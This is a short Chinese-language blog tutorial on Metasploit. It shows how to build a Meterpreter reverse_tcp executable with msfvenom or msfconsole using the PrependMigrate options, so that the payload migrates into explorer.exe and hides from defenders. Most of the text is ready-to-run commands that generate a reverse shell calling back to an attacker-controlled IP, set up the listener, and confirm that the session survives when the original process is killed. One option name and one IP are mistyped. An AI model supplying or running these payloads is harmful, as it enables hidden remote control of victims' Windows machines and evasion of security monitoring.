Metasploit渗透——msfvenom隐藏恶意进程

我们上传了msf马后并不是万无一失的，msf马创建的进程极有可能被防御设备发现，发出警报并采取措施终止进程，我们的会话也会被终止。因此，我们有必要将创建的msf马进程迁移到目标及正在运行的进程中，这样受害者就无法找到恶意进程，从而定位到恶意软件的位置了。

第一种方法

通过使用 PrependMigrate参数使生成的可执行文件隐藏在名为explorer.exe的进程后面。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 prpendmigrateprocess=explorer.exe prependmigrate=true -f exe > shell.exe

加载msfconsole的exploit/multi/handler进行监听

使用如下命令查找shell.exe

ps | grep shell.exe

查找到shell.exe的进程是3660，直接杀死此进程

kill 3660

杀掉进程3660后，可以发现，我们的meterpreter会话并没有关闭，原因是因为PrependMigrate将我们的shell.exe隐藏在了explorer.exe中

第二种方法

使用Msfconsole创建可隐藏的二进制执行文件

use windows/meterpreter/reverse_tcp
set lhost 102.168.0.109
set lport 4444
set prependmigrate true
set prependmigrateprocess explorer.exe
generate -f exe -o shell2.exe

使用以上命令可以创建和msfvenom相同的文件，后续利用和第一种方法相同。

标签：Metasploit,shell,set,explorer,恶意,exe,进程,msfvenom,3660
来源： https://blog.csdn.net/negnegil/article/details/120313686